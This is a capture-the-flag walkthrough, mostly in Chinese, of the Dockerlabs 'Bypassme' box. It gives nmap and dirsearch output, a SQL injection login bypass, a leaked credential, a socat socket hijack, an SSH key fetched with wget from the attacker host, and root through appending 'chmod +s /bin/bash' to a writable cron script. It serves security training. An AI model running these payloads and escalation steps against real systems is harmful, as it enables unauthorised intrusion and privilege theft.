Dockerlabs-Bypassme

Box Info
#

OS	Difficulty
Linux	Easy

Nmap
#

[root@kali] /home/kali/bypassme  
❯ nmap 172.17.0.2 -sV -A -p- 

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 9.6p1 Ubuntu 3ubuntu13.11 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   256 b4:a8:42:e7:2b:2f:7a:f9:50:bd:6d:31:8e:36:54:7b (ECDSA)
|_  256 c0:ff:28:31:a3:0b:1a:3d:c3:5f:83:1b:3c:44:28:32 (ED25519)
80/tcp open  http    Apache httpd 2.4.58 ((Ubuntu))
| http-cookie-flags: 
|   /: 
|     PHPSESSID: 
|_      httponly flag not set
| http-title: Login Panel
|_Requested resource was login.php
|_http-server-header: Apache/2.4.58 (Ubuntu)

Dirsearch
#

[root@kali] /home/kali/bypassme  
❯ dirsearch -u 172.17.0.2                     

  _|. _ _  _  _  _ _|_    v0.4.3                                                                                                                
 (_||| _) (/_(_|| (_| )                                                                                                                         
                                                                                                                                                
Extensions: php, asp, aspx, jsp, html, htm | HTTP method: GET | Threads: 25 | Wordlist size: 12289

Target: http://172.17.0.2/

[10:03:10] Scanning:                                                                                                                            
[10:03:11] 403 -   275B - /.php                                             
[10:03:18] 302 -     0B - /index.php  ->  login.php                         
[10:03:18] 302 -     0B - /index.php/login/  ->  login.php                  
[10:03:18] 200 -    2KB - /login.php                                        
[10:03:18] 403 -   275B - /logs                                             
[10:03:18] 403 -   275B - /logs/access_log                                  
[10:03:18] 403 -   275B - /logs/                                            
[10:03:18] 403 -   275B - /logs/access.log                                  
[10:03:18] 403 -   275B - /logs/error.log
[10:03:18] 403 -   275B - /logs/error_log
[10:03:18] 403 -   275B - /logs/liferay.log
[10:03:18] 403 -   275B - /logs/mail.log
[10:03:18] 403 -   275B - /logs/proxy_error_log
[10:03:18] 403 -   275B - /logs/proxy_access_ssl_log
[10:03:18] 403 -   275B - /logs/wsadmin.traceout
[10:03:18] 403 -   275B - /logs/errors.log
[10:03:18] 403 -   275B - /logs/www-error.log
[10:03:21] 403 -   275B - /server-status/                                   
[10:03:21] 403 -   275B - /server-status                                    
                                                                             
Task Completed

发现存在一个/logs目录，但是无法直接查看，还是来到登陆页面查看

SQL Injection
#

尝试使用sqlmap失败，进行手动构建

username: admin
password: admin' or '1'='1

进入到了后台，在页面源码中得到注释，存在logs.txt，应该是存在于/logs目录下的

<!-- dev note: remember to secure logs.txt path before deploy -->

得到一些用户名和密码，其中登录成功的就是albert

albert:NGxiM3J0MTIz

Own conx
#

上传pspy查看进程，发现存在定时任务，但是无法修改，注意一下这个/home/conx/.cache/.sock是可以直接访问的

albert@e4a0b1838d15:/tmp$ ./pspy64 
pspy - version: v1.2.1 - Commit SHA: f9e6a1590a4312b9faa093d8dc84e19567977a6d


     ██▓███    ██████  ██▓███ ▓██   ██▓
    ▓██░  ██▒▒██    ▒ ▓██░  ██▒▒██  ██▒
    ▓██░ ██▓▒░ ▓██▄   ▓██░ ██▓▒ ▒██ ██░
    ▒██▄█▓▒ ▒  ▒   ██▒▒██▄█▓▒ ▒ ░ ▐██▓░
    ▒██▒ ░  ░▒██████▒▒▒██▒ ░  ░ ░ ██▒▓░
    ▒▓▒░ ░  ░▒ ▒▓▒ ▒ ░▒▓▒░ ░  ░  ██▒▒▒ 
    ░▒ ░     ░ ░▒  ░ ░░▒ ░     ▓██ ░▒░ 
    ░░       ░  ░  ░  ░░       ▒ ▒ ░░  
                   ░           ░ ░     
                               ░ ░     

Config: Printing events (colored=true): processes=true | file-system-events=false ||| Scanning for processes every 100ms and on inotify events ||| Watching directories: [/usr /tmp /etc /home /var /opt] (recursive) | [] (non-recursive)
Draining file system events due to startup...
done
2025/05/31 01:21:50 CMD: UID=1001  PID=80     | ./pspy64 
2025/05/31 01:21:50 CMD: UID=1001  PID=70     | -bash 
2025/05/31 01:21:50 CMD: UID=1001  PID=69     | sshd: albert@pts/0 
2025/05/31 01:21:50 CMD: UID=0     PID=58     | sshd: albert [priv] 
2025/05/31 01:21:50 CMD: UID=0     PID=57     | tail -f /dev/null 
2025/05/31 01:21:50 CMD: UID=1002  PID=54     | socat UNIX-LISTEN:/home/conx/.cache/.sock,fork EXEC:/bin/bash 
2025/05/31 01:21:50 CMD: UID=0     PID=50     | /usr/sbin/cron -P 
2025/05/31 01:21:50 CMD: UID=0     PID=44     | sshd: /usr/sbin/sshd [listener] 0 of 10-100 startups 
2025/05/31 01:21:50 CMD: UID=33    PID=33     | /usr/sbin/apache2 -k start 
2025/05/31 01:21:50 CMD: UID=33    PID=32     | /usr/sbin/apache2 -k start 
2025/05/31 01:21:50 CMD: UID=33    PID=31     | /usr/sbin/apache2 -k start 
2025/05/31 01:21:50 CMD: UID=33    PID=30     | /usr/sbin/apache2 -k start 
2025/05/31 01:21:50 CMD: UID=33    PID=29     | /usr/sbin/apache2 -k start 
2025/05/31 01:21:50 CMD: UID=0     PID=24     | /usr/sbin/apache2 -k start 
2025/05/31 01:21:50 CMD: UID=0     PID=1      | /bin/bash /etc/.start_services 


albert@e4a0b1838d15:/tmp$ socat - UNIX-CONNECT:/home/conx/.cache/.sock
id
uid=1002(conx) gid=1002(conx) groups=1002(conx)

添加ssh密钥

mkdir .ssh
cd .ssh
wget 172.17.0.1/authorized_keys
cd ..
chmod 700 .ssh

Root
#

注意到定时任务中的文件是可以修改的

conx@e4a0b1838d15:~$ cat /etc/cron.d/backup-cron 
* * * * * root bash /var/backups/backup.sh
conx@e4a0b1838d15:~$ ls -al /var/backups/backup.sh 
-rw-rw-r-- 1 conx root 246 May 22 15:47 /var/backups/backup.sh

添加一句话，设置Bash的SUID

conx@e4a0b1838d15:~$ echo 'chmod +s /bin/bash' >> /var/backups/backup.sh

Summary
#

User: 简单的sql注入（实际上是静态比较）,然后连接sock文件得到conx Root: 修改定时任务执行的文件，添加SUID

Reply by Email

Box Info #

Nmap #

Dirsearch #

SQL Injection #

Own conx #

Root #

Summary #